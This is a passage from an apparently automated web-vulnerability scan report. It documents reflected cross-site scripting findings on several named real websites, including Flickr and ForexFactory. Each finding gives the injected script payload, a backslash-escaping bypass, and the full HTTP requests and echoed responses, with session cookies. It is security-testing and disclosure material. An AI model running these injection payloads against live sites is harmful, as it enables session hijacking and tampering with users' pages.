Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94242332.1308054477.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=94242332.1196155334.1308054477.1308054477.1308054477.1; __utmc=94242332; __utmv=94242332.anonymous%20user|1=User%20roles=anonymous%20user=1,; __utmb=94242332.6.10.1308054477; DestinationURL=http%3A%2F%2Fwww.pega.com%2Fuser; RedirectFunction=login; ASPSESSIONIDSQBDSBTB=AMBIJDIDLIMGJAPGNGCFEOGB

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Expires: Tue, 14 Jun 2011 12:28:06 GMT
Date: Tue, 14 Jun 2011 12:29:06 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
Pragma: no-cache
Cache-control: no-cache
Vary: Accept-Encoding
Content-Length: 31648


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<!-- InstanceBegin template="/
...[SNIP]...
test_cookie') == 'cookie_value') {
       // cookie worked
       $.cookie('nocheck', '1', { expires: 180, path: '/', domain: 'pega.com', secure: false });
       //redirect to destination
       var dst = "/login.asp36122";alert(1)//fab585167f2";
       if (dst == '') {
           dst = "/login.asp";    
       }
       if (dst != 'bad'){
           document.location = dst;
       }
   } else {
       // cookie failed
       alert("To sign in to pega.com, you must have cookies enabl
...[SNIP]...

3.27. http://members.pega.com/login.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://members.pega.com
Path:   /login.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eeb55"%3balert(1)//5f8752a598e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as eeb55";alert(1)//5f8752a598e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /login.asp?eeb55"%3balert(1)//5f8752a598e=1 HTTP/1.1
Host: members.pega.com
Proxy-Connection: keep-alive
Referer: http://members.pega.com/cookiecheck.asp?pcd=/login.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94242332.1308054477.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); DestinationURL=http%3A%2F%2Fwww.pega.com%2Fuser; RedirectFunction=login; ASPSESSIONIDSQBDSBTB=AMBIJDIDLIMGJAPGNGCFEOGB; __utma=94242332.1196155334.1308054477.1308054477.1308054477.1; __utmc=94242332; __utmv=94242332.anonymous%20user|1=User%20roles=anonymous%20user=1,; __utmb=94242332.8.10.1308054477; __utmz=87550468.1308054615.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=87550468.1252779431.1308054615.1308054615.1308054615.1; __utmc=87550468; __utmb=87550468.1.10.1308054615; test_cookie=cookie_value; nocheck=1

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Expires: Tue, 14 Jun 2011 12:36:11 GMT
Date: Tue, 14 Jun 2011 12:37:11 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
Pragma: no-cache
Set-Cookie: pega%5Fautolog=000; expires=Wed, 13-Jun-2012 04:00:00 GMT; path=/
Cache-control: no-cache
Vary: Accept-Encoding
Content-Length: 35643


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Te
...[SNIP]...
true;
   finished &= emailComplete(e.email_address.value);
   finished &= passwordCheck(e.password_display.value);
   return finished;
}

function tryToRegister(){
   e.login_form.action="register.asp?eeb55";alert(1)//5f8752a598e=1&";
   e.submitted.value = "1";
   //hide("password_display");
   e.password.value = lemon(e.password_display.value);
   e.password_display.value = "";
   e.login_form.onsubmit = null;
   e.login_form.subm
...[SNIP]...

3.28. http://pglb.buzzfed.com/63975/17983acd3149cc7b59eebf3385392137 [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pglb.buzzfed.com
Path:   /63975/17983acd3149cc7b59eebf3385392137

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 925bf<script>alert(1)</script>2fdbf40cf8d was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /63975/17983acd3149cc7b59eebf3385392137?callback=BF_PARTNER.gate_response925bf<script>alert(1)</script>2fdbf40cf8d&cb=8678 HTTP/1.1
Host: pglb.buzzfed.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=ISO-8859-1
Server: lighttpd
Content-Length: 79
Cache-Control: max-age=604800
Expires: Tue, 21 Jun 2011 00:16:54 GMT
Date: Tue, 14 Jun 2011 00:16:54 GMT
Connection: close

BF_PARTNER.gate_response925bf<script>alert(1)</script>2fdbf40cf8d(1280325136);

3.29. http://s.intensedebate.com/css/sys.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.intensedebate.com
Path:   /css/sys.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ae139'><script>alert(1)</script>bafed2ed83c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/sys.cssae139'><script>alert(1)</script>bafed2ed83c?q=57 HTTP/1.1
Host: s.intensedebate.com
Proxy-Connection: keep-alive
Referer: http://intensedebate.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=239309019.1307475308.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; __utma=239309019.1191985641.1307475308.1307475308.1307475308.1; __qca=P0-470302247-1307475307888

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Date: Tue, 14 Jun 2011 00:32:53 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Server: nginx
Vary: Accept-Encoding
Content-Length: 4707

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/css/sys.cssae139'><script>alert(1)</script>bafed2ed83c?q=57'>
...[SNIP]...

3.30. http://s.intensedebate.com/images/automattic.png [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.intensedebate.com
Path:   /images/automattic.png

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1f737'><script>alert(1)</script>5e66b7822e6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/automattic.png1f737'><script>alert(1)</script>5e66b7822e6?25 HTTP/1.1
Host: s.intensedebate.com
Proxy-Connection: keep-alive
Referer: http://intensedebate.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=239309019.1307475308.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; __utma=239309019.1191985641.1307475308.1307475308.1307475308.1; __qca=P0-470302247-1307475307888

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Date: Tue, 14 Jun 2011 00:33:37 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Server: nginx
Vary: Accept-Encoding
Content-Length: 4714

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/images/automattic.png1f737'><script>alert(1)</script>5e66b7822e6?25'>
...[SNIP]...

3.31. http://s.intensedebate.com/images/home-sites-sprite.jpg [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.intensedebate.com
Path:   /images/home-sites-sprite.jpg

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4388a'><script>alert(1)</script>3c963389289 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/home-sites-sprite.jpg4388a'><script>alert(1)</script>3c963389289?=1 HTTP/1.1
Host: s.intensedebate.com
Proxy-Connection: keep-alive
Referer: http://intensedebate.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=239309019.1307475308.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; __utma=239309019.1191985641.1307475308.1307475308.1307475308.1; __qca=P0-470302247-1307475307888

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Date: Tue, 14 Jun 2011 00:33:35 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Server: nginx
Vary: Accept-Encoding
Content-Length: 4725

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/images/home-sites-sprite.jpg4388a'><script>alert(1)</script>3c963389289?=1'>
...[SNIP]...

3.32. http://s.intensedebate.com/images/home-sprite.png [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.intensedebate.com
Path:   /images/home-sprite.png

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload bd235'><script>alert(1)</script>f9a69b4d5e8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/home-sprite.pngbd235'><script>alert(1)</script>f9a69b4d5e8?=2 HTTP/1.1
Host: s.intensedebate.com
Proxy-Connection: keep-alive
Referer: http://intensedebate.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=239309019.1307475308.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; __utma=239309019.1191985641.1307475308.1307475308.1307475308.1; __qca=P0-470302247-1307475307888

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Date: Tue, 14 Jun 2011 00:33:37 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Server: nginx
Vary: Accept-Encoding
Content-Length: 4717

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/images/home-sprite.pngbd235'><script>alert(1)</script>f9a69b4d5e8?=2'>
...[SNIP]...

3.33. http://s.intensedebate.com/images/sprite.png [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.intensedebate.com
Path:   /images/sprite.png

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 158c7'><script>alert(1)</script>4f5547cba37 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/sprite.png158c7'><script>alert(1)</script>4f5547cba37?=4 HTTP/1.1
Host: s.intensedebate.com
Proxy-Connection: keep-alive
Referer: http://intensedebate.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=239309019.1307475308.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; __utma=239309019.1191985641.1307475308.1307475308.1307475308.1; __qca=P0-470302247-1307475307888

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Date: Tue, 14 Jun 2011 00:33:13 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Server: nginx
Vary: Accept-Encoding
Content-Length: 4714

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/images/sprite.png158c7'><script>alert(1)</script>4f5547cba37?=4'>
...[SNIP]...

3.34. http://s.intensedebate.com/js/idm-combined.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.intensedebate.com
Path:   /js/idm-combined.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 77480'><script>alert(1)</script>bc81ff4a3c8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/idm-combined.js77480'><script>alert(1)</script>bc81ff4a3c8?v=1 HTTP/1.1
Host: s.intensedebate.com
Proxy-Connection: keep-alive
Referer: http://intensedebate.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=239309019.1307475308.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; __utma=239309019.1191985641.1307475308.1307475308.1307475308.1; __qca=P0-470302247-1307475307888

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Date: Tue, 14 Jun 2011 00:33:16 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Server: nginx
Vary: Accept-Encoding
Content-Length: 4717

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/js/idm-combined.js77480'><script>alert(1)</script>bc81ff4a3c8?v=1'>
...[SNIP]...

3.35. http://www.flickr.com/apps/badge/badge_iframe.gne [zg_bg_color parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.flickr.com
Path:   /apps/badge/badge_iframe.gne

Issue detail

The value of the zg_bg_color request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 306cf'%3balert(1)//9384b172f5d was submitted in the zg_bg_color parameter. This input was echoed as 306cf';alert(1)//9384b172f5d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /apps/badge/badge_iframe.gne?zg_bg_color=ffffff306cf'%3balert(1)//9384b172f5d&zg_person_id=56984041%40N00 HTTP/1.1
Host: www.flickr.com
Proxy-Connection: keep-alive
Referer: http://www.yadvertisingblog.com/blog/2011/05/31/yahoo-launches-clear-ad-notice/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=1uvu3ch6t691c&b=3&s=5n

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:21:23 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
X-Served-By: www146.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Age: 0
Via: HTTP/1.1 r11.ycpi.ne1.yahoo.net (YahooTrafficServer/1.20.0 [cMsSf ]), HTTP/1.1 r13.ycpi.ac4.yahoo.net (YahooTrafficServer/1.20.0 [cMsSf ])
Server: YTS/1.20.0
Proxy-Connection: keep-alive
Content-Length: 3543


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<script type="text/javascript" src="http://l.yimg.com/g/javascript/fpi.js.v62
...[SNIP]...
fined) ? 37 : zg_wh;


var zg_fw = zg_cols*zg_wh+((zg_cols-1)*1); // border of one
var zg_fh = zg_rows*zg_wh+((zg_rows-1)*1); // border of one

var zg_bg_color = 'ffffff';
zg_bg_color = 'ffffff306cf';alert(1)//9384b172f5d';
var zg_url = 'http://'+fl_host+'/apps/badge/flashbadge.swf?host=http://'+fl_host+'&bg_color='+zg_bg_color+'&cols='+zg_cols+'&rows='+zg_rows+'&wh='+zg_wh+'&swapInterv='+zg_swapInterv+'&loadInterv='+
...[SNIP]...

3.36. http://www.flickr.com/apps/badge/badge_iframe.gne [zg_person_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.flickr.com
Path:   /apps/badge/badge_iframe.gne

Issue detail

The value of the zg_person_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 43105'%3balert(1)//1a54a9cab45 was submitted in the zg_person_id parameter. This input was echoed as 43105';alert(1)//1a54a9cab45 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /apps/badge/badge_iframe.gne?zg_bg_color=ffffff&zg_person_id=56984041%40N0043105'%3balert(1)//1a54a9cab45 HTTP/1.1
Host: www.flickr.com
Proxy-Connection: keep-alive
Referer: http://www.yadvertisingblog.com/blog/2011/05/31/yahoo-launches-clear-ad-notice/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=1uvu3ch6t691c&b=3&s=5n

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:21:28 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
X-Served-By: www100.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Age: 0
Via: HTTP/1.1 r07.ycpi.ne1.yahoo.net (YahooTrafficServer/1.20.0 [cMsSf ]), HTTP/1.1 r16.ycpi.ac4.yahoo.net (YahooTrafficServer/1.20.0 [cMsSf ])
Server: YTS/1.20.0
Proxy-Connection: keep-alive
Content-Length: 3543


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<script type="text/javascript" src="http://l.yimg.com/g/javascript/fpi.js.v62
...[SNIP]...
.indexOf("MSIE 6") > 0 || ua.indexOf("MSIE 7") > 0) {
            // IE 5.5+
       } else {
            if (ua.indexOf('Gecko') == -1) return false;
       }
}
return true;
}
       
var zg_nsid = '56984041@N0043105';alert(1)//1a54a9cab45';
var zg_scope = '0';
var zg_favorites = '0';
var zg_tags = '';
var zg_tag_mode = 'all';
var zg_group_id = '';
var zg_text = '';
var zg_set_id = '';
var zg_context = '';

var zg_swapInterv =
...[SNIP]...

3.37. http://www.forexfactory.com/excal.php [colors[2] parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.forexfactory.com
Path:   /excal.php

Issue detail

The value of the colors[2] request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2b114\"%3balert(1)//a2b9ca92c9 was submitted in the colors[2] parameter. This input was echoed as 2b114\\";alert(1)//a2b9ca92c9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /excal.php?do=fetch&width=845&height=500&font=14&dark=0&colors[3]=%23869BBF%20url%28images/gradients/gradient_tcat.gif%29%20repeat-x&colors[5]=%235C7099%20url%28images/gradients/gradient_thead.gif%29%20repeat-x&colors[7]=%23F5F5FF&colors[4]=%23FFFFFF&colors[6]=%23FFFFFF&colors[8]=%23000000cfe41\%22%3balert(document.location)//5fae3ef9ef8&colors[1]=%230B198C&colors[2]=%23d1d1e12b114\"%3balert(1)//a2b9ca92c9&width_type=px&height_type=px&timezone=-5&timeformat=0&timedst=1&nocache=8229.065318565583 HTTP/1.1
Host: www.forexfactory.com
Proxy-Connection: keep-alive
Referer: http://burp/show/2
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fflastvisit=1308052908; ffsessionhash=1eda646f3ad4d2f8115b4662e9982e43; fflastactivity=0; __utmz=113005075.1308052959.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=113005075.1431033565.1308052959.1308052959.1308052959.1; __utmc=113005075; __utmb=113005075.1.10.1308052959

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 12:28:21 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: fflastvisit=1308052908; expires=Wed, 13-Jun-2012 12:28:21 GMT; path=/; domain=.forexfactory.com
Set-Cookie: fflastactivity=0; expires=Wed, 13-Jun-2012 12:28:21 GMT; path=/; domain=.forexfactory.com
Cache-Control: private
Pragma: private
X-UA-Compatible: IE=7
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: application/x-javascript; charset=windows-1252
Content-Length: 68250

var _sds_html = '';
_sds_html += "<form method=\"post\"action=\"index.php\" onsubmit=\"return ffSyndication_Calendar.calendar_filters(this, false);\" name=\"_cal_filters\">";
_sds_html += "<input ty
...[SNIP]...
<td class=\"dateHeading\" colspan=\"9\" style=\"border-bottom: 1px solid #d1d1e12b114\\";alert(1)//a2b9ca92c9;\" width=\"100%\">
...[SNIP]...

3.38. http://www.forexfactory.com/excal.php [colors[4] parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.forexfactory.com
Path:   /excal.php

Issue detail

The value of the colors[4] request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 927e6\"%3balert(1)//62c8519a6c1 was submitted in the colors[4] parameter. This input was echoed as 927e6\\";alert(1)//62c8519a6c1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /excal.php?do=fetch&width=845&height=500&font=14&dark=0&colors[3]=%23869BBF%20url%28images/gradients/gradient_tcat.gif%29%20repeat-x&colors[5]=%235C7099%20url%28images/gradients/gradient_thead.gif%29%20repeat-x&colors[7]=%23F5F5FF&colors[4]=%23FFFFFF927e6\"%3balert(1)//62c8519a6c1&colors[6]=%23FFFFFF&colors[8]=%23000000cfe41\%22%3balert(document.location)//5fae3ef9ef8&colors[1]=%230B198C&colors[2]=%23d1d1e1&width_type=px&height_type=px&timezone=-5&timeformat=0&timedst=1&nocache=8229.065318565583 HTTP/1.1
Host: www.forexfactory.com
Proxy-Connection: keep-alive
Referer: http://burp/show/2
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fflastvisit=1308052908; ffsessionhash=1eda646f3ad4d2f8115b4662e9982e43; fflastactivity=0; __utmz=113005075.1308052959.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=113005075.1431033565.1308052959.1308052959.1308052959.1; __utmc=113005075; __utmb=113005075.1.10.1308052959

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 12:27:59 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
